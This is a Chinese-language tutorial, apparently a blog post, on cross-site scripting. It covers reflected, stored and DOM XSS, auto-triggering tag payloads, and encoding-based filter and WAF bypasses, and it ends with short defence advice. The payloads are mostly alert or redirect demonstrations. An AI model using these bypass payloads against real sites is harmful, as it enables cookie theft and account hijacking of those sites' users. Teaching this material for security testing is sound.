Web安全之XSS跨站脚本攻击

1.XSS 漏洞简介

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。

攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

2.XSS的原理

• 攻击者对含有漏洞的服务器发起XSS攻击（注入JS代码）。
• 诱使受害者打开受到攻击的服务器URL。
• 受害者在Web浏览器中打开URL，恶意脚本执行。

3.常用的XSS攻击手段和目的

• 盗用cookie，获取敏感信息。
• 利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用Java等得到类似的操作。
• 利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
• 利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
• 在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。

 xss平台：https://xss.pt/

4.XSS的攻击方式

反射型XSS：<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。一般是后端代码进行处理。

存储型XSS：<持久化> 代码是存储在服务器数据库中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种XSS非常危险，容易造成蠕虫，大量盗窃cookie（虽然还有种DOM型XSS，但是也还是包括在存储型XSS内）。

DOM型XSS：基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞。一般是浏览器前端代码进行处理。

5.XSS的危害

1. 挂马
2. 盗取用户Cookie。
3. DOS（拒绝服务）客户端浏览器。
4. 钓鱼攻击，高级的钓鱼技巧。
5. 删除目标文章、恶意篡改数据、嫁祸。
6. 劫持用户Web行为，甚至进一步渗透内网。
7. 爆发Web2.0蠕虫。
8. 蠕虫式的DDoS攻击。
9. 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
10. 其它安全问题

6.常用的标签与属性

下面我列举的标签大部分是可以自动触发js代码的，无需用户去交互，大部分情况下我们也是希望是自动触发而不是等用户去触发。

竞争焦点，从而触发onblur事件

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

使用open属性触发ontoggle事件，无需用户去触发

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发:









利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发:

</code></h4> <pre><code class="language-javascript"><textarea onfocus=alert("xss"); autofocus></code></pre> <h4 id="slide-18"><code><keygen></code></h4> <pre><code class="language-javascript"><keygen autofocus onfocus=alert(1)> //仅限火狐</code></pre> <h4 id="slide-19"><code><marquee></code></h4> <pre><code class="language-javascript"><marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以</code></pre> <h4><strong><code><isindex></code></strong></h4> <pre><code class="language-javascript"><isindex type=image src=1 onerror=alert("xss")>//仅限于IE</code></pre> <h4 id="slide-20">利用link远程包含js文件</h4> <pre><code class="language-javascript"><link rel=import href="http://127.0.0.1/1.js"></code></pre> <h4 id="slide-21">javascript伪协议</h4> <pre><code class="language-javascript"><a>标签 <a href="javascript:alert(`xss`);">xss</a> <iframe>标签 <iframe src=javascript:alert('xss');></iframe> <img>标签 <img src=javascript:alert('xss')>//IE7以下 <form>标签 <form action="Javascript:alert(1)"><input type=submit></code></pre> <h2><span style="color:#fe2c24;">7.常见XSS绕过技巧</span></h2> <h3>空格绕过</h3> <p>当空格被过滤掉时，我们可以用 / 来代替空格</p> <pre><code class="language-javascript"><img/src="x"/onerror=alert(1);></code></pre> <h3>引号过滤</h3> <p>如果是HTML标签中，我们可以不用引号。如果在JS中，我们可以用反引号代替单双引号</p> <pre><code class="language-javascript"><img src=x onerror=alert(`xss`);></code></pre> <h3>括号绕过</h3> <p>当括号被过滤掉的时候我们可以使用throw来绕过</p> <pre><code class="language-javascript"><img src=x onerror="javascript:window.onerror=alert;throw 1"></code></pre> <h3>大小写绕过</h3> <pre><code class="language-javascript"><ImG sRc=x onerRor=alert("xss");></code></pre> <h3>双写绕过</h3> <p>有些waf可能只会替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过</p> <pre><code class="language-javascript"><imimgg srsrcc=x onerror=alert("xss");></code></pre> <h3 id="slide-5">字符拼接绕过</h3> <p><strong>利用eval</strong></p> <pre><code class="language-javascript"><img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"></code></pre> <p><strong>利用top</strong></p> <pre><code class="language-javascript"><script>top["al"+"ert"](`xss`);</script></code></pre> <h3>其它字符混淆</h3> <p>有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了</p> <pre><code class="language-javascript">可利用注释、标签的优先级等 <<script>alert("xss");//<</script> <title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效 <SCRIPT>var a="\\";alert("xss");//";</SCRIPT></code></pre> <h3>JavaScript伪协议</h3> <p><strong>使用o_n和<scr_ipt>过滤时</strong></p> <pre><code class="language-javascript">"><a href=javascript:alert(/xss/)> </code></pre> <h3>编码绕过</h3> <p><strong>Unicode编码绕过</strong></p> <pre><code class="language-javascript"><img src="x" onerror="alert("xss");"> javascript:alert(/xss/) (编码了r和i) <img src="x"onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\ u003b')"></code></pre> <p><strong>url编码绕过</strong></p> <pre><code class="language-javascript"><img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe></code></pre> <p><strong>Ascii码绕过</strong></p> <pre><code class="language-javascript"><img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"></code></pre> <p><strong>hex绕过</strong></p> <pre><code class="language-javascript"><img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')></code></pre> <p><strong>base64绕过</strong></p> <pre><code class="language-javascript"><img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></code></pre> <h3>URL绕过</h3> <p><strong>使用URL编码</strong></p> <pre><code class="language-javascript"><img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`> javascript:alert('xsshttp://')</code></pre> <p><strong>使用IP</strong></p> <pre><code class="language-javascript">1.十进制IP <img src="x" onerror=document.location=`http://2130706433/`> 2.八进制IP <img src="x" onerror=document.location=`http://0177.0.0.01/`> 3.hex <img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`> 4.html标签中用//可以代替http:// <img src="x" onerror=document.location=`//www.baidu.com`> 5.使用\\ 但是要注意在windows下\本身就有特殊用途，是一个path 的写法，所以\\在Windows下是file协议，在linux下才会是当前域的协议 6.使用中文逗号代替英文逗号 如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号 <img src="x" onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度</code></pre> <h3>DIV绕过</h3> <p>利用DIV标签的STYLE属性中的表达式实现XSS攻击：</p> <pre><code class="language-javascript"><DIV STYLE="width: expression(alert('XSS'));"></code></pre> <h2 id="slide-22"><span style="color:#fe2c24;">8.XSS的防御措施</span></h2> <p>（1）编码：对用户输入的数据进行HTML Entity编码</p> <p>（2）过滤：移除用户上传的DOM属性，如onerror等，移除用户上传的style节点，script节点，iframe节点等。</p> <p>（3）校正：避免直接对HTML Entity编码，使用DOM Prase转换，校正不配对的DOM标签。</p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1830726423149637632"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(web安全,安全,渗透测试)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1835247244572454912.htm" title="服务器状态监控php源码,服务器状态监控_监控Linux服务器网站状态的SHELL脚本" target="_blank">服务器状态监控php源码,服务器状态监控_监控Linux服务器网站状态的SHELL脚本</a> <span class="text-muted">温糯米</span> <a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%8A%B6%E6%80%81%E7%9B%91%E6%8E%A7php%E6%BA%90%E7%A0%81/1.htm">服务器状态监控php源码</a> <div>摘要腾兴网为您分享:监控Linux服务器网站状态的SHELL脚本，蜗牛集市，同花顺，探客宝，手柄助手等软件知识，以及日期倒计时插件，云南省教育资源公共，rui手机桌面，小屁孩桌面便签，合金装备崛起复仇，朝夕日历，photoshop图像处理软件,一年级学生每日计划表，悟空找房，饿了吗外卖商家版，逃生，中国民宿网，realpolitiks，交通安全知识竞赛，雅思流利说等软件it资讯，欢迎关注腾兴网。1</div> </li> <li><a href="/article/1835245730810392576.htm" title="华为USG6000E-S12防火墙Key exchange failed.无法SSH解决方案" target="_blank">华为USG6000E-S12防火墙Key exchange failed.无法SSH解决方案</a> <span class="text-muted">redmond88</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%8A%80%E6%9C%AF/1.htm">网络技术</a><a class="tag" taget="_blank" href="/search/ssh/1.htm">ssh</a><a class="tag" taget="_blank" href="/search/%E5%8D%8E%E4%B8%BA/1.htm">华为</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a> <div>由于目前防火墙算法太新，导致crt和xshell的版本无法登陆，按以下方法解决一、下载华为本地加载除弱安全算法组件包之外的组件包https://download.csdn.net/download/redmond88/89620664?spm=1001.2014.3001.5503二、先改后缀名为.cfg,上传文件到防火墙三、在用户视图下改后缀名为.mod四、move文件到$_install_mo</div> </li> <li><a href="/article/1835244971544899584.htm" title="Jooq 框架介绍及其核心要点" target="_blank">Jooq 框架介绍及其核心要点</a> <span class="text-muted">木南曌</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>一、引言Jooq（JavaPersistenceforRelationalDatabases）是一个强大的类型安全的SQL查询构建器和ORM（Object-RelationalMapping）框架，专为Java和Kotlin设计。它为开发者提供了一种优雅的方式来编写SQL代码，同时还能享受到静态类型检查带来的好处。本文将详细介绍Jooq的核心功能，并通过一系列的代码示例来展示如何使用Jooq。二、</div> </li> <li><a href="/article/1835237284379717632.htm" title="Vector与Stack简述" target="_blank">Vector与Stack简述</a> <span class="text-muted">Sun_Jingjing</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/%E9%9B%86%E5%90%88/1.htm">集合</a> <div>Vector：线程安全，默认容量为10，容量增长量默认为0，每次进行扩容是旧的容量乘以2。支持null的添加。基于数组实现。Stack：Stack继承Vector的栈结构。</div> </li> <li><a href="/article/1835232449030877184.htm" title="校车安全管理工作情况汇报" target="_blank">校车安全管理工作情况汇报</a> <span class="text-muted">mayooly</span> <div>近年来，在省、市校车办和县政府的正确领导下，在相关部门的大力支持下，我县认真落实《校车安全管理条例》、《湖北省校车管理办法》和《关于在全市推行校车公司化改革的意见》（黄政办发[2016]54号）要求，构建“政府主导、属地管理、市场运作、公司运营、部门监管、财政补贴”校车运营管理模式，规范校车安全管理，强化领导落实责任，扎实开展校车安全专项督查治理工作，全县校车安全管理工作无重大责任事故发生，确保了</div> </li> <li><a href="/article/1835230530250043392.htm" title="京东快递个人寄件怎么操作？贵不贵？" target="_blank">京东快递个人寄件怎么操作？贵不贵？</a> <span class="text-muted">氧惠_飞智666999</span> <div>总所周知，如今的京东自营店快递已经成为行业的标杆的存在的，大家对于它的印象就是物流快而且安全，服务态度也好。而现在京东快递也可以个人寄件使用啦，那么下面介绍一下京东快递个人寄件怎么操作?贵不贵?氧惠APP，2022全新模式，0投资，最快63天做到月入十万。我的直推也会放到你下面，我曾经1年做到百万团队，现在加入我也会帮你做到百万团队。【氧惠】百度有几百万篇报道，也期待你的加入。飞智导师，氧惠首码邀</div> </li> <li><a href="/article/1835229467124002816.htm" title="SpringSecurity初学总结" target="_blank">SpringSecurity初学总结</a> <span class="text-muted">weixin_66442229</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>springSecurity安全框架基于Java的安全框架主要有:SpringSecurity和Shiro介绍基础概念安全框架是对用户访问权限的控制,保证应用的安全性。其主要的工作是用户认证和用户授权|鉴权主要应用于Spring的企业应用系统,提供声明式的安全访问控制解决方案。它提供了一组可以在Spring应用上下文中配置的Bean能很好的结合Spring的DI依赖注入和AOP面向切面编程功能应用</div> </li> <li><a href="/article/1835220392986374144.htm" title="STM32 如何生成随机数" target="_blank">STM32 如何生成随机数</a> <span class="text-muted">千千道</span> <a class="tag" taget="_blank" href="/search/STM32/1.htm">STM32</a><a class="tag" taget="_blank" href="/search/stm32/1.htm">stm32</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E7%89%87%E6%9C%BA/1.htm">单片机</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91/1.htm">物联网</a> <div>目录一、引言二、STM32随机数发生器概述三、工作原理1.噪声源2.线性反馈移位寄存器（LFSR）3.数据寄存器（RNG_DR）4.监控和检测电路：5.控制和状态寄存器6.生成流程四、使用方法1.使能随机数发生器2.读取随机数3.错误处理五、注意事项1.随机数的质量2.安全性3.性能考虑六、总结一、引言在嵌入式系统开发中，随机数的生成常常是一个重要的需求。无论是用于加密、模拟、游戏还是其他需要不确</div> </li> <li><a href="/article/1835207788687618048.htm" title="php 实现JWT" target="_blank">php 实现JWT</a> <span class="text-muted">每天瞎忙的农民工</span> <a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>在PHP中，JSONWebToken(JWT)是一种开放标准(RFC7519)用于在各方之间作为JSON对象安全地传输信息。JWT通常用于身份验证系统，如OAuth2或基于令牌的身份验证。以下是一个基本的PHP实现JWT生成和验证的代码示例。JWT的组成部分JWT包含三个部分：Header（头部）：说明算法和令牌类型。Payload（有效载荷）：包含声明（如用户数据、过期时间等）。Signatur</div> </li> <li><a href="/article/1835198093654585344.htm" title="有故事的皮同学" target="_blank">有故事的皮同学</a> <span class="text-muted">小傻同学</span> <div>没有安全感真的是很多女生的通病。今天朋友跟我说，她最近总是会故意说一些气话，去试探男朋友心里到底还有没有自己。她说她总感觉男朋友会突然离开，心里很不踏实，也没多少信心走下去了。都说女生的第六感是最准的，尤其是在恋爱的时候，那些你感受到的不在乎可能都是真的。晚安真的当离开一个人以后，才发现原来自己的记忆力那么好，只记得他的好。死撑面子要自尊，等到聊天窗口再也跳不出他的消息才知道自己任性，其实谁都不想</div> </li> <li><a href="/article/1835193039778312192.htm" title="处理绿盟科技安全评估的系统漏洞" target="_blank">处理绿盟科技安全评估的系统漏洞</a> <span class="text-muted">自我修炼的小石头</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E5%B7%A5%E5%85%B7/1.htm">开发工具</a> <div>如下图一次扫描,中度风险39个,这个是必须要处理的.其中mysql占了36个,一看这个感觉整个人都不好了.但是最后解决的办法也很简单,就是升级.系统版本Redhat7.31.telnet因为要升级openssh,openssl,为了避免意外,首先要开启telnet服务,并把所有相关的包上传到服务器.1.1确认是否安装了telnet和xinetd（默认是没有安装）rpm-qatelnet*rpm-q</div> </li> <li><a href="/article/1835192913345212416.htm" title="python logging模块默认日志级别_一看就懂，Python 日志 logging 模块详解及应用" target="_blank">python logging模块默认日志级别_一看就懂，Python 日志 logging 模块详解及应用</a> <span class="text-muted">路易·罗莎</span> <a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/logging%E6%A8%A1%E5%9D%97%E9%BB%98%E8%AE%A4%E6%97%A5%E5%BF%97%E7%BA%A7%E5%88%AB/1.htm">logging模块默认日志级别</a> <div>日志概述百度百科的日志概述：Windows网络操作系统都设计有各种各样的日志文件，如应用程序日志，安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等，这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时，这些日志文件通常会记录下我们操作的一些相关内容，这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测，系统就会在安全日志</div> </li> <li><a href="/article/1835189885280022528.htm" title="关于项目中使用shiro进行安全管理的总结" target="_blank">关于项目中使用shiro进行安全管理的总结</a> <span class="text-muted">一颗大青柠</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/Shiro/1.htm">Shiro</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>关于项目中使用shiro进行安全管理的总结关于SpringBoot下使用shiro进行用户认证与权限管理对于安全框架有一定了解的开发者一定对于shiro这款安全框架有一定的了解，这里我们不再对该框架进行其设计与知识的介绍，仅对于我的个人项目中所使用到的进行一个总结，并放上代码。使用该框架的第一步，进行配置：packagecom.libvirtjava.demo.vm.util.config;imp</div> </li> <li><a href="/article/1835189379878973440.htm" title="springcloud — 微服务鉴权管理Spring Security原理解析(二)" target="_blank">springcloud — 微服务鉴权管理Spring Security原理解析(二)</a> <span class="text-muted">RachelHwang</span> <a class="tag" taget="_blank" href="/search/springcloud/1.htm">springcloud</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/security/1.htm">security</a><a class="tag" taget="_blank" href="/search/oauth2/1.htm">oauth2</a><a class="tag" taget="_blank" href="/search/springcloud/1.htm">springcloud</a> <div>引言：回顾之前介绍的OAuth2简单分析与介绍，微服务鉴权管理之OAuth2原理解析(一)，前面的部分，我们关注了SpringSecurity是如何完成认证工作的，但是另外一部分核心的内容：过滤器，一直没有提到，我们已经知道SpringSecurity使用了springSecurityFilterChain作为了安全过滤的入口，这一节主要分析一下这个过滤器链都包含了哪些关键的过滤器，并且各自的使命</div> </li> <li><a href="/article/1835186135496749056.htm" title="找寻出口" target="_blank">找寻出口</a> <span class="text-muted">戴红霞</span> <div>我怎么如此幸运-重生5-戴红霞（2020-09-03）我怎么如此幸运-找寻出口1.我怎么如此幸运意想不到早上5点45直播前看到舅舅的咳血，确实挺紧张的。但是总觉得血的颜色不太对。一般生病的人咳血印象中是深红色，不是浅红色。而医院给危重病人输血也是深红色。舅舅这咳的血是不是受到空间挤压后，咽喉黏膜出的血呢？跟载体大循环“紊乱”有关，与微循环无关。真正决定生命安全的大多与微循环有关。而舅舅的微循环特别</div> </li> <li><a href="/article/1835183410532937728.htm" title="Apache Shiro安全框架(2)-用户认证" target="_blank">Apache Shiro安全框架(2)-用户认证</a> <span class="text-muted">heyrian</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/shiro/1.htm">shiro</a> <div>身份认证在shiro中用户需要提供用户的principals（身份）和credentials（证明）来证明该用户属于当前系统用户。常见的认证方式即用户名/密码。在解释身份认证之前，我们先来看看shiro中的Subject和Realm,这是身份认证的两个关键的概念。Subjectsubject代表当前用户，内部主要维护当前用户信息。shiro中所有的subject都交给SecurityManager</div> </li> <li><a href="/article/1835182528177205248.htm" title="解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411)" target="_blank">解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411)</a> <span class="text-muted">dieweidong5625</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>有时候会检测到服务器有很多漏洞，而大部分漏洞都是由于服务的版本过低的原因，因为官网出现漏洞就会发布新版本来修复这个漏洞，所以一般情况下，我们只需要对相应的软件包进行升级到安全版本即可。通过查阅官网信息，OracleMySQLServer远程安全漏洞(CVE-2015-0411)，受影响系统：OracleMySQLServer/usr/databases.sql//先备份原有所有数据，防止数据丢失。</div> </li> <li><a href="/article/1835181353684004864.htm" title="Html Day01" target="_blank">Html Day01</a> <span class="text-muted">所以你一定要努力</span> <div>一、HTML与Web标准1.1五大浏览器厂商以及浏览器内核浏览器内核备注ChromeBlinkBlink其实是WebKit的分支。在WebKit上二次开发IETridentIE、猎豹安全、360极速浏览器、百度浏览器SafariWebkit从Safari推出之时起，它的渲染引擎就是Webkit。FirefoxGecko使用不多。打开速度慢、升级频繁。OperaBlink现在跟随chrome用bli</div> </li> <li><a href="/article/1835179052554612736.htm" title="京东返利app哪个最好？京东官方返利app？" target="_blank">京东返利app哪个最好？京东官方返利app？</a> <span class="text-muted">测评君高省</span> <div>京东返利app哪个最好？其实现在网络购物优惠的新趋势都是推出返利购物模式，像淘宝京东等大电商平台，都有推出自己返利模式，目前市场上铺天盖地的有许多京东返利app的宣传，关于京东返利app哪个最好，其实网上也有比较和排名，我们根据返利金额、返利提现门槛、安全性等，选择了一款最好的京东返利app，那其实就是高省app。京东返利是什么？京东返利是指在京东商城下单后领取一笔返返利佣金，我们可以通过高省这样</div> </li> <li><a href="/article/1835175594103500800.htm" title="怎么选择适合的服务器" target="_blank">怎么选择适合的服务器</a> <span class="text-muted">666IDCaaa</span> <a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a> <div>大家都知道，不管是公司还是个人，在数字化浪潮已经席卷全球的环境下，大家对服务器的需求是日渐增长的。很多人在买服务器的时候，多少都有点选择困难，今天我们就来对比下物理服务器和弹性云服务器，看看选哪个更省心。物理服务器：老牌实力派，稳定可靠想象一下，物理服务器就像你家的老式冰箱，虽然样子有点过时，但性能稳定，用起来心里踏实。优点：完全控制，性能强悍，安全感十足。缺点：价格小贵，升级麻烦，维护还得自己来</div> </li> <li><a href="/article/1835172687656349696.htm" title="省钱快报真实可信吗？揭秘其与品牌商家合作、用户评价和数据加密措施！" target="_blank">省钱快报真实可信吗？揭秘其与品牌商家合作、用户评价和数据加密措施！</a> <span class="text-muted">优惠券高省</span> <div>在众多省钱平台中，省钱快报备受用户关注。本文将重点探讨省钱快报的安全性，评估其提供的服务是否可靠，并对高省app官方邀请码（000018）进行有效性验证，为用户提供更多信息和保障。一、省钱快报的安全性分析省钱快报作为一个提供省钱信息和返利服务的平台，一直关注用户数据的安全。该平台采取了多重安全措施，包括数据加密、账户认证、交易监控等，保障用户信息的安全性。此外，平台与品牌商家建立合作关系，确保提供</div> </li> <li><a href="/article/1835161122253139968.htm" title="元宵节，再见" target="_blank">元宵节，再见</a> <span class="text-muted">牛来牛去_2165</span> <div>元宵节，没有吃到元宵，只吃了一大桌酒菜。是公司聚餐，把大家伙围拢到一起，搞了几个节目，自娱自乐了一番。早起的鞭炮声，还有空气中飘荡的烟雾，预示着今天是个节日。其余的，并没有什么特殊的情怀。记得，小时候，大街上，小巷子，到处都是锣鼓喧天，热闹非凡。这样热闹的场面，也只有元宵节会有。有舞狮，有武术，样式繁多，看的人们眼花缭乱。街上人头攒动，挤扛不动，夹杂在人群中央，感觉到前所未有的安全感，贼好看。如今</div> </li> <li><a href="/article/1835159337459347456.htm" title="【编程底层原理】HashMap Hashtable ConcurrentHashMap" target="_blank">【编程底层原理】HashMap Hashtable ConcurrentHashMap</a> <span class="text-muted">Dylanioucn</span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>在Java的不同版本中，集合的实现原理有所变化，尤其是在HashMap、Hashtable和ConcurrentHashMap这三种实现中。以下是它们的一些关键区别和实现原理：一、HashMapJDK1.7：HashMap使用数组和链表的组合来解决冲突。当一个桶（数组的每个位置）中的元素超过一定数量时，会使用链表来存储这些元素。HashMap在JDK1.7中不是线程安全的。JDK1.8：进行了优化</div> </li> <li><a href="/article/1835158956851425280.htm" title="直返APP安全吗 直返APP靠谱吗 直返背景揭秘" target="_blank">直返APP安全吗 直返APP靠谱吗 直返背景揭秘</a> <span class="text-muted">氧惠购物达人</span> <div>最近朋友推荐我一个返利app，名字叫做直返APP，小编没听过直返APP，不知道直返APP安全吗。于是，小编百度了一下，发现了直返APP是否靠谱，下面，小编就为大家介绍一下直返APP揭秘。氧惠APP（带货领导者）——是与以往完全不同的抖客+淘客app！2023全新模式，我的直推也会放到你下面。主打：带货高补贴，深受各位带货团队长喜爱（每天出单带货几十万单）。注册即可享受高补贴+0撸+捡漏等带货新体验</div> </li> <li><a href="/article/1835153538464968704.htm" title="Cisco SD-WAN (Viptela) 20.15.1 发布，新增功能概览" target="_blank">Cisco SD-WAN (Viptela) 20.15.1 发布，新增功能概览</a> <span class="text-muted">sysin.org</span> <a class="tag" taget="_blank" href="/search/CiSCO/1.htm">CiSCO</a><a class="tag" taget="_blank" href="/search/Cisco/1.htm">Cisco</a><a class="tag" taget="_blank" href="/search/SD-WAN/1.htm">SD-WAN</a><a class="tag" taget="_blank" href="/search/Viptela/1.htm">Viptela</a><a class="tag" taget="_blank" href="/search/%E6%80%9D%E7%A7%91/1.htm">思科</a><a class="tag" taget="_blank" href="/search/SDN/1.htm">SDN</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E5%AE%9A%E4%B9%89/1.htm">软件定义</a><a class="tag" taget="_blank" href="/search/%E5%B9%BF%E5%9F%9F%E7%BD%91/1.htm">广域网</a> <div>CiscoSD-WAN(Viptela)version20.15.1ED-软件定义广域网CiscoSD-WANpoweredbyViptela请访问原文链接：https://sysin.org/blog/cisco-sd-wan-20/，查看最新版。原创作品，转载请保留出处。作者主页：sysin.org支持SASE的架构，其集成了面向多云、安全、统一通信和应用优化的各种功能，可用于轻松安全地将任何</div> </li> <li><a href="/article/1835152709024575488.htm" title="世卫组织警告：到目前为止新变种XE可能是传播速度最快的新冠毒株" target="_blank">世卫组织警告：到目前为止新变种XE可能是传播速度最快的新冠毒株</a> <span class="text-muted">樂伊李_李昂梁</span> <div>英国政府官网近日发布消息报告了3种新冠病毒变种重组情况。数据显示，英国目前已发现了637例XE病例(即奥密克戎BA.1和BA.2的重组)。虽然该病例较为稀少，但它具有极高的传播速度，这意味着XE具有大范围流行的潜力。据英国政府网站介绍，当个体同时感染2种或更多的新冠变种时，就会产生重组变种。而这种情况并不少见，在新冠大流行期间已发现了几种新冠变种重组的情况。英国卫生安全局(UKHSA)对3种情况进</div> </li> <li><a href="/article/1835145853401133056.htm" title="核电站安全吗？" target="_blank">核电站安全吗？</a> <span class="text-muted">生活JQKH</span> <div>几年前的春节，亲戚们闲聊中说起三门核电站快建好。那天天气晴好，一众人上楼到我家阳台指着蛇蟠岛说，看，就是那个地方对面。那个地方在天气好的时候能看得很清楚。大多数人欢欣鼓舞，有核电站，那一片的发展指日可待。我们靠三门那么近，大桥一造，十来分钟就从三门核电站到我们这边，蛇蟠岛将来也不再像以前那样是落寇盘踞的凶险地方。核电站对这一整片的经济文化有很大好处。也有一些人说核电站啊，福岛核电站，切尔诺贝利核电</div> </li> <li><a href="/article/1835144716480507904.htm" title="如何搭建一个ip池用来做数据抓取用" target="_blank">如何搭建一个ip池用来做数据抓取用</a> <span class="text-muted">KookeeyLena4</span> <a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" 